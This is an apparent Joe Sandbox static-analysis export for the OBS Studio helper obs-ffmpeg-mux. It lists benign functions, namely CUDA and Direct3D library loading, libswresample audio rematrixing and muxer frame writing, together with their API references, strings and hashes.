cuMemsetD8Async, xrefs: 00007FF8A7BFBC92, 00007FF8A7BFBC9B
cuGLGetDevices_v2, xrefs: 00007FF8A7BFC602, 00007FF8A7BFC60B
nvcuda.dll, xrefs: 00007FF8A7BFB8C1, 00007FF8A7BFB8F9, 00007FF8A7BFB961, 00007FF8A7BFCD01, 00007FF8A7BFD0C1
cuArrayCreate_v2, xrefs: 00007FF8A7BFCA25, 00007FF8A7BFCA2E
cuCtxPushCurrent_v2, xrefs: 00007FF8A7BFBB42, 00007FF8A7BFBB4B
cuDeviceGetAttribute, xrefs: 00007FF8A7BFBA2A, 00007FF8A7BFBA33
Loaded lib: %s, xrefs: 00007FF8A7BFB968
cuArray3DCreate_v2, xrefs: 00007FF8A7BFCA60, 00007FF8A7BFCA69
cuImportExternalMemory, xrefs: 00007FF8A7BFC7D7, 00007FF8A7BFC7E0
cuMemcpyHtoDAsync_v2, xrefs: 00007FF8A7BFBE2C, 00007FF8A7BFBE35
cuCtxDestroy_v2, xrefs: 00007FF8A7BFBBB2, 00007FF8A7BFBBBB
cuDestroyExternalMemory, xrefs: 00007FF8A7BFC812, 00007FF8A7BFC81B
cuLinkDestroy, xrefs: 00007FF8A7BFC465, 00007FF8A7BFC46E
cuArrayDestroy, xrefs: 00007FF8A7BFCA9B, 00007FF8A7BFCAA4
cuEventCreate, xrefs: 00007FF8A7BFC252, 00007FF8A7BFC25B
cuDevicePrimaryCtxReset, xrefs: 00007FF8A7BFC0F0, 00007FF8A7BFC0F9
cuMemcpyDtoD_v2, xrefs: 00007FF8A7BFBEDD, 00007FF8A7BFBEE6
cuDeviceComputeCapability, xrefs: 00007FF8A7BFBA9A, 00007FF8A7BFBAA3
cuSignalExternalSemaphoresAsync, xrefs: 00007FF8A7BFC9AF, 00007FF8A7BFC9B8
cuModuleLoadData, xrefs: 00007FF8A7BFC4A0, 00007FF8A7BFC4A9
cuCtxCreate_v2, xrefs: 00007FF8A7BFBAD2, 00007FF8A7BFBADB
cuEGLStreamProducerConnect, xrefs: 00007FF8A7BFCAD6, 00007FF8A7BFCADF
cuTexObjectDestroy, xrefs: 00007FF8A7BFC5C7, 00007FF8A7BFC5D0
cuMemcpyHtoD_v2, xrefs: 00007FF8A7BFBDF1, 00007FF8A7BFBDFA
cuImportExternalSemaphore, xrefs: 00007FF8A7BFC939, 00007FF8A7BFC942
cuLinkAddData, xrefs: 00007FF8A7BFC3EF, 00007FF8A7BFC3F8
cuGraphicsD3D11RegisterResource, xrefs: 00007FF8A7BFCC73, 00007FF8A7BFCC7C
cuEventDestroy_v2, xrefs: 00007FF8A7BFC28D, 00007FF8A7BFC296
cuStreamQuery, xrefs: 00007FF8A7BFC166, 00007FF8A7BFC16F
cuDevicePrimaryCtxGetState, xrefs: 00007FF8A7BFC0B5, 00007FF8A7BFC0BE
cuD3D11GetDevices, xrefs: 00007FF8A7BFCC38, 00007FF8A7BFCC41
cuEGLStreamProducerPresentFrame, xrefs: 00007FF8A7BFCB87, 00007FF8A7BFCB90
cuInit, xrefs: 00007FF8A7BFB983, 00007FF8A7BFB98C
Cannot load %s, xrefs: 00007FF8A7BFCD20, 00007FF8A7BFD0C8
cuModuleGetGlobal, xrefs: 00007FF8A7BFC551, 00007FF8A7BFC55A

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: AddressProc$Library$_aligned_free$ByteCharFreeHandleLoadModuleMultiWidefree$_errnocalloc
String ID: Cannot load %s$Cannot load optional %s$Loaded lib: %s$Loaded sym: %s$SetDefaultDllDirectories$cuArray3DCreate_v2$cuArrayCreate_v2$cuArrayDestroy$cuCtxCreate_v2$cuCtxDestroy_v2$cuCtxGetDevice$cuCtxPopCurrent_v2$cuCtxPushCurrent_v2$cuCtxSetLimit$cuD3D11GetDevice$cuD3D11GetDevices$cuDestroyExternalMemory$cuDestroyExternalSemaphore$cuDeviceComputeCapability$cuDeviceGet$cuDeviceGetAttribute$cuDeviceGetCount$cuDeviceGetName$cuDeviceGetUuid$cuDevicePrimaryCtxGetState$cuDevicePrimaryCtxRelease$cuDevicePrimaryCtxReset$cuDevicePrimaryCtxRetain$cuDevicePrimaryCtxSetFlags$cuEGLStreamConsumerDisconnect$cuEGLStreamProducerConnect$cuEGLStreamProducerDisconnect$cuEGLStreamProducerPresentFrame$cuEGLStreamProducerReturnFrame$cuEventCreate$cuEventDestroy_v2$cuEventQuery$cuEventRecord$cuEventSynchronize$cuExternalMemoryGetMappedBuffer$cuExternalMemoryGetMappedMipmappedArray$cuGLGetDevices_v2$cuGetErrorName$cuGetErrorString$cuGraphicsD3D11RegisterResource$cuGraphicsGLRegisterImage$cuGraphicsMapResources$cuGraphicsResourceGetMappedPointer_v2$cuGraphicsSubResourceGetMappedArray$cuGraphicsUnmapResources$cuGraphicsUnregisterResource$cuImportExternalMemory$cuImportExternalSemaphore$cuInit$cuLaunchKernel$cuLinkAddData$cuLinkComplete$cuLinkCreate$cuLinkDestroy$cuMemAllocManaged$cuMemAllocPitch_v2$cuMemAlloc_v2$cuMemFree_v2$cuMemcpy$cuMemcpy2DAsync_v2$cuMemcpy2D_v2$cuMemcpyAsync$cuMemcpyDtoDAsync_v2$cuMemcpyDtoD_v2$cuMemcpyDtoHAsync_v2$cuMemcpyDtoH_v2$cuMemcpyHtoDAsync_v2$cuMemcpyHtoD_v2$cuMemsetD8Async$cuMipmappedArrayDestroy$cuMipmappedArrayGetLevel$cuModuleGetFunction$cuModuleGetGlobal$cuModuleLoadData$cuModuleUnload$cuSignalExternalSemaphoresAsync$cuStreamAddCallback$cuStreamCreate$cuStreamDestroy_v2$cuStreamQuery$cuStreamSynchronize$cuTexObjectCreate$cuTexObjectDestroy$cuWaitExternalSemaphoresAsync$kernel32.dll$nvcuda.dll
API String ID: 3405737670-3447704524
Opcode ID: 4af3281c0e25db81b3078cec52e73783fda2d96fdf649ea0d565a5970141e5c3
Instruction ID: 705070ffb83d682c1ca36567d669b4d5a89e4e0f1f36787ef5fc9294f2a61ada
Opcode Fuzzy Hash: 4af3281c0e25db81b3078cec52e73783fda2d96fdf649ea0d565a5970141e5c3
Instruction Fuzzy Hash: F1D20965A0BB47A1EB01EF20E8656FD27A6EF84BC5F844432C84D0B795DE7CE506E390

Function 00007FF8A7BFFDF0 Relevance: 140.7, APIs: 62, Strings: 18, Instructions: 667libraryloaderCOMMON

Download Yara Rule

APIs

atoi.MSVCRT ref: 00007FF8A7BFFE1E
MultiByteToWideChar.KERNEL32 ref: 00007FF8A7BFFE84
MultiByteToWideChar.KERNEL32 ref: 00007FF8A7BFFEC6
GetProcAddress.KERNEL32 ref: 00007FF8A7BFFEEE
LoadLibraryExW.KERNEL32 ref: 00007FF8A7BFFF04
_aligned_free.MSVCRT ref: 00007FF8A7BFFF12
MultiByteToWideChar.KERNEL32 ref: 00007FF8A7BFFF50
MultiByteToWideChar.KERNEL32 ref: 00007FF8A7BFFF9A
GetProcAddress.KERNEL32 ref: 00007FF8A7BFFFB4
LoadLibraryExW.KERNEL32 ref: 00007FF8A7BFFFCA
_aligned_free.MSVCRT ref: 00007FF8A7BFFFD6
GetProcAddress.KERNEL32 ref: 00007FF8A7BFFFF2
GetProcAddress.KERNEL32 ref: 00007FF8A7C000D6
GetDesktopWindow.USER32 ref: 00007FF8A7C0014A
_errno.MSVCRT ref: 00007FF8A7C00220
GetProcAddress.KERNEL32 ref: 00007FF8A7C00256
LoadLibraryExA.KERNEL32 ref: 00007FF8A7C00270
_errno.MSVCRT ref: 00007FF8A7C0027B
GetProcAddress.KERNEL32 ref: 00007FF8A7C002A8
_aligned_free.MSVCRT ref: 00007FF8A7C002B5
_aligned_free.MSVCRT ref: 00007FF8A7C002BC
GetProcAddress.KERNEL32 ref: 00007FF8A7C00398
GetDesktopWindow.USER32 ref: 00007FF8A7C003EB

Strings

Using D3D9Ex device., xrefs: 00007FF8A7C0019A
dxva2.dll, xrefs: 00007FF8A7BFFF36, 00007FF8A7BFFF89, 00007FF8A7C00598
Failed to bind Direct3D device to device manager, xrefs: 00007FF8A7C0096C
Direct3DCreate9, xrefs: 00007FF8A7C0030F
Failed to create Direct3D device manager, xrefs: 00007FF8A7C0098A
d3d9.dll, xrefs: 00007FF8A7BFFE5A, 00007FF8A7BFFEB5, 00007FF8A7C00269
&, xrefs: 00007FF8A7C00408
Failed to create IDirect3D object, xrefs: 00007FF8A7C00A18
Failed to locate Direct3DCreate9, xrefs: 00007FF8A7C00A50
Failed to load DXVA2 library, xrefs: 00007FF8A7C002C9
Failed to open device handle, xrefs: 00007FF8A7C009A8
SetDefaultDllDirectories, xrefs: 00007FF8A7BFFEE4, 00007FF8A7BFFFAA, 00007FF8A7C0024C, 00007FF8A7C0029E
Direct3DCreate9Ex, xrefs: 00007FF8A7C00011
Failed to load D3D9 library, xrefs: 00007FF8A7C005C5
Failed to create Direct3D device, xrefs: 00007FF8A7C00425
Failed to locate DXVA2CreateDirect3DDeviceManager9, xrefs: 00007FF8A7C0094E
DXVA2CreateDirect3DDeviceManager9, xrefs: 00007FF8A7BFFFE8
kernel32.dll, xrefs: 00007FF8A7BFFECF, 00007FF8A7BFFF9C, 00007FF8A7C00237, 00007FF8A7C00290

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: AddressProc$ByteCharMultiWide_aligned_free$LibraryLoad$DesktopWindow_errno$atoi
String ID: &$DXVA2CreateDirect3DDeviceManager9$Direct3DCreate9$Direct3DCreate9Ex$Failed to bind Direct3D device to device manager$Failed to create Direct3D device$Failed to create Direct3D device manager$Failed to create IDirect3D object$Failed to load D3D9 library$Failed to load DXVA2 library$Failed to locate DXVA2CreateDirect3DDeviceManager9$Failed to locate Direct3DCreate9$Failed to open device handle$SetDefaultDllDirectories$Using D3D9Ex device.$d3d9.dll$dxva2.dll$kernel32.dll
API String ID: 1760633067-2418308259
Opcode ID: 1b8f3b45278436593ea4620b683ff6dcafb812b761b95205c1ba724c4eb98057
Instruction ID: 8961cd534909e156850a84de95b8bdff34c0f60939852074d1b96b613cdf8d51
Opcode Fuzzy Hash: 1b8f3b45278436593ea4620b683ff6dcafb812b761b95205c1ba724c4eb98057
Instruction Fuzzy Hash: BC528D31A0AB82A1EB649F65E4047BE67A1FF84BC0F014536D98E47B95DF7CE046E780

Function 00007FF8BFB63AA7 Relevance: 130.3, APIs: 64, Strings: 10, Instructions: 798COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BFB63940: av_channel_layout_describe.AVUTIL-58 ref: 00007FF8BFB63999
Part of subcall function 00007FF8BFB63940: av_log.AVUTIL-58 ref: 00007FF8BFB639B0

av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB63BBE
av_channel_layout_subset.AVUTIL-58 ref: 00007FF8BFB63BCF
av_channel_layout_uninit.AVUTIL-58 ref: 00007FF8BFB63BDC
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB63C2E
av_channel_layout_subset.AVUTIL-58 ref: 00007FF8BFB63C3F
av_channel_layout_uninit.AVUTIL-58 ref: 00007FF8BFB63C4C
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB63CA3
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB63CD3
av_channel_layout_from_mask.AVUTIL-58 ref: 00007FF8BFB63CE4
av_channel_layout_describe.AVUTIL-58 ref: 00007FF8BFB63CF5
av_log.AVUTIL-58 ref: 00007FF8BFB63D0C
av_channel_layout_check.AVUTIL-58 ref: 00007FF8BFB63D14
av_log.AVUTIL-58 ref: 00007FF8BFB63D32
av_channel_layout_describe.AVUTIL-58 ref: 00007FF8BFB63D5A
av_log.AVUTIL-58 ref: 00007FF8BFB63D71
av_channel_layout_check.AVUTIL-58 ref: 00007FF8BFB63D7E
av_log.AVUTIL-58 ref: 00007FF8BFB63D9C
av_channel_layout_describe.AVUTIL-58 ref: 00007FF8BFB63DCB
av_log.AVUTIL-58 ref: 00007FF8BFB63DE2
av_channel_layout_uninit.AVUTIL-58 ref: 00007FF8BFB64A05
av_channel_layout_uninit.AVUTIL-58 ref: 00007FF8BFB64A0F

Strings

Output channel layout is invalid, xrefs: 00007FF8BFB63D87
Assertion %s failed at %s:%d, xrefs: 00007FF8BFB63F52
%s: , xrefs: 00007FF8BFB6497A
Output channel layout '%s' is not supported, xrefs: 00007FF8BFB63DDB
src/libswresample/rematrix.c, xrefs: 00007FF8BFB63F3B
Input channel layout '%s' is not supported, xrefs: 00007FF8BFB63D6A
%s:%f , xrefs: 00007FF8BFB649C3
Input channel layout is invalid, xrefs: 00007FF8BFB63D1D
Full-on remixing from 22.2 has not yet been implemented! Processing the input as '%s', xrefs: 00007FF8BFB63D05
Matrix coefficients:, xrefs: 00007FF8BFB64924

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: av_log$av_channel_layout_compareav_channel_layout_describeav_channel_layout_uninit$av_channel_layout_checkav_channel_layout_subset$av_channel_layout_from_mask
String ID: %s: $%s:%f $Assertion %s failed at %s:%d$Full-on remixing from 22.2 has not yet been implemented! Processing the input as '%s'$Input channel layout '%s' is not supported$Input channel layout is invalid$Matrix coefficients:$Output channel layout '%s' is not supported$Output channel layout is invalid$src/libswresample/rematrix.c
API String ID: 2619559304-3174812640
Opcode ID: 5aa9f050ff1bdde174cdacfa5c37e80b8c215c118cb67db339f9d22cf6abd8d3
Instruction ID: dc5867ef09da7cd443d3ffe0a3f7c5cb0d980423bc9d066d8da5a450e350ef9c
Opcode Fuzzy Hash: 5aa9f050ff1bdde174cdacfa5c37e80b8c215c118cb67db339f9d22cf6abd8d3
Instruction Fuzzy Hash: 26827D22D1CF8695F666CEA9A4103BBF365EF963C4F509332DB4E66945DF3DE0818A00

Function 00007FF8BFB87508 Relevance: 90.2, APIs: 36, Strings: 15, Instructions: 913COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB875A4
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8768B
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB876D6
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB876F7
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB87767
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB87779

Strings

`template static data member destructor helper', xrefs: 00007FF8BFB88017
protected: , xrefs: 00007FF8BFB88248
virtual , xrefs: 00007FF8BFB88199
`local static destructor helper', xrefs: 00007FF8BFB87F96
private: , xrefs: 00007FF8BFB88216
}' , xrefs: 00007FF8BFB87726, 00007FF8BFB87C67
public: , xrefs: 00007FF8BFB8826F
`template static data member constructor helper', xrefs: 00007FF8BFB87FD4
extern "C" , xrefs: 00007FF8BFB88336
`vtordisp{, xrefs: 00007FF8BFB87BDD
[thunk]:, xrefs: 00007FF8BFB882E1
/, xrefs: 00007FF8BFB8801E
static , xrefs: 00007FF8BFB88122
`adjustor{, xrefs: 00007FF8BFB87C3C
`vtordispex{, xrefs: 00007FF8BFB87B08

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Name::operator+
String ID: /$[thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
API String ID: 2943138195-2884338863
Opcode ID: dfe3c345cf42f50a30eb54d6b673e306e5f826d7c41941afd65b24be17fee6d5
Instruction ID: a3b6ce949c3797d67e2760f05b50147cdb32243b6c39215a80d81e251aad42f3
Opcode Fuzzy Hash: dfe3c345cf42f50a30eb54d6b673e306e5f826d7c41941afd65b24be17fee6d5
Instruction Fuzzy Hash: B4924372A1C78296EB50DB98E4802AEB7A0FBC4384F505135FB8E47A9ADF7CD544CB40

Function 00007FF8BFB64B4A Relevance: 83.2, APIs: 43, Strings: 4, Instructions: 981COMMON

Download Yara Rule

APIs

av_get_packed_sample_fmt.AVUTIL-58 ref: 00007FF8BFB64BAC
av_get_packed_sample_fmt.AVUTIL-58 ref: 00007FF8BFB64BC5
av_calloc.AVUTIL-58 ref: 00007FF8BFB64C81
av_mallocz.AVUTIL-58 ref: 00007FF8BFB64C93
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB64DAC
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB64DF3
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB64E3C
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB64ED5
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB64F19
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB65047
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB6508E
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB650D7
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB65170
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB651B4
av_calloc.AVUTIL-58 ref: 00007FF8BFB652AA
av_mallocz.AVUTIL-58 ref: 00007FF8BFB652BC
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB65380
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB653C7
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB65410
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB654A9
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB654ED
av_calloc.AVUTIL-58 ref: 00007FF8BFB655E3
av_mallocz.AVUTIL-58 ref: 00007FF8BFB655F5
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB656BD
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB65704
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB6574D
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB657E6
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB6582A
av_mallocz.AVUTIL-58 ref: 00007FF8BFB65918
av_calloc.AVUTIL-58 ref: 00007FF8BFB65937
av_freep.AVUTIL-58 ref: 00007FF8BFB65963
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB65A2C
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB65A73
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB65ABC
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB65B55
av_channel_layout_compare.AVUTIL-58 ref: 00007FF8BFB65B99
av_log.AVUTIL-58 ref: 00007FF8BFB65C71
abort.MSVCRT ref: 00007FF8BFB65C76
av_get_cpu_flags.AVUTIL-58 ref: 00007FF8BFB672E3
av_calloc.AVUTIL-58 ref: 00007FF8BFB67341
av_mallocz.AVUTIL-58 ref: 00007FF8BFB67352

Strings

?, xrefs: 00007FF8BFB65AAA
Assertion %s failed at %s:%d, xrefs: 00007FF8BFB65C62
@, xrefs: 00007FF8BFB64C24
src/libswresample/rematrix.c, xrefs: 00007FF8BFB65C4B

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: av_channel_layout_compare$av_callocav_mallocz$av_get_packed_sample_fmt$abortav_freepav_get_cpu_flagsav_log
String ID: ?$@$Assertion %s failed at %s:%d$src/libswresample/rematrix.c
API String ID: 589828794-1409810779
Opcode ID: 5188afd4967a419cf0fd434335850466d59e66cd640ed80c7eb5b51fe742ae3d
Instruction ID: 23e286bab471394794b717b5f2a20ba024f57c17da20395f03f1014374bbd326
Opcode Fuzzy Hash: 5188afd4967a419cf0fd434335850466d59e66cd640ed80c7eb5b51fe742ae3d
Instruction Fuzzy Hash: 22A2F77390CA8AA5F7628BA99059FBAB3A8FF053C0F505135CB8D57684DF3DA099C704

Function 00007FF649AA2EE0 Relevance: 54.6, APIs: 29, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF649AA2F39
SetErrorMode.KERNEL32 ref: 00007FF649AA2F5D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF649AA2F6B
WideCharToMultiByte.KERNEL32 ref: 00007FF649AA2FD8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF649AA2FE7
WideCharToMultiByte.KERNEL32 ref: 00007FF649AA3016
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF649AA3044
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF649AA304D
_setmode.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF649AA305A
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF649AA3065
setvbuf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF649AA3077
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF649AA3098
fprintf.MSPDB140-MSVCRT ref: 00007FF649AA30A8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF649AA30F8
realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF649AA311C
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF649AA3167
fprintf.MSPDB140-MSVCRT ref: 00007FF649AA3177
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF649AA319A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF649AA31A3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF649AA31C5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF649AA31D6
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF649AA3215
realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF649AA3239
av_rescale_q_rnd.AVUTIL-58 ref: 00007FF649AA330C
av_rescale_q_rnd.AVUTIL-58 ref: 00007FF649AA3344
av_interleaved_write_frame.AVFORMAT-60 ref: 00007FF649AA336D
av_strerror.AVUTIL-58 ref: 00007FF649AA33BA
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF649AA33C4
fprintf.MSPDB140-MSVCRT ref: 00007FF649AA33DE

Part of subcall function 00007FF649AA2320: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,00007FF649AA29D8,?,?,?,00007FF649AA12F1), ref: 00007FF649AA2357

Strings

av_interleaved_write_frame failed: %d: %s, xrefs: 00007FF649AA33D7
Couldn't initialize muxer, xrefs: 00007FF649AA30A1, 00007FF649AA3170

Memory Dump Source

Source File: 0000000B.00000002.2291350522.00007FF649AA1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF649AA0000, based on PE: true

Associated: 0000000B.00000002.2291251062.00007FF649AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291384389.00007FF649AA5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291442922.00007FF649AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291474165.00007FF649AA9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff649aa0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: __acrt_iob_func$freemalloc$fprintf$ByteCharMultiWideav_rescale_q_rndrealloc$ErrorMode__stdio_common_vfprintf_fileno_setmodeav_interleaved_write_frameav_strerrormemsetsetvbuf
String ID: Couldn't initialize muxer$av_interleaved_write_frame failed: %d: %s
API String ID: 4192084208-164389310
Opcode ID: 90e4d641eae2122b72088982d14054dbbcc6ef952270b6c02c8a2abd6878b3b9
Instruction ID: 693c3d84967ec952ebc492ab80d94f61b8d2981b97a1cea87b71db568d1acf84
Opcode Fuzzy Hash: 90e4d641eae2122b72088982d14054dbbcc6ef952270b6c02c8a2abd6878b3b9
Instruction Fuzzy Hash: 25E18E22B4CA8287EB20BF61E8542BD77A0FB99B94F405136DE0E97B54DF3CD5858710

Function 00007FF8A7BEC2F0 Relevance: 51.3, APIs: 25, Strings: 4, Instructions: 582stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF8A7BEC347
strtol.MSVCRT ref: 00007FF8A7BEC3ED
strchr.MSVCRT ref: 00007FF8A7BEC462
strcmp.MSVCRT ref: 00007FF8A7BEC564
_aligned_free.MSVCRT ref: 00007FF8A7BEC594
_aligned_free.MSVCRT ref: 00007FF8A7BEC59E
_aligned_free.MSVCRT ref: 00007FF8A7BEC5D5

Strings

mono, xrefs: 00007FF8A7BEC317
ambisonic , xrefs: 00007FF8A7BEC3A0
channels, xrefs: 00007FF8A7BECB80
%d channels (%[^)], xrefs: 00007FF8A7BEC44B

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
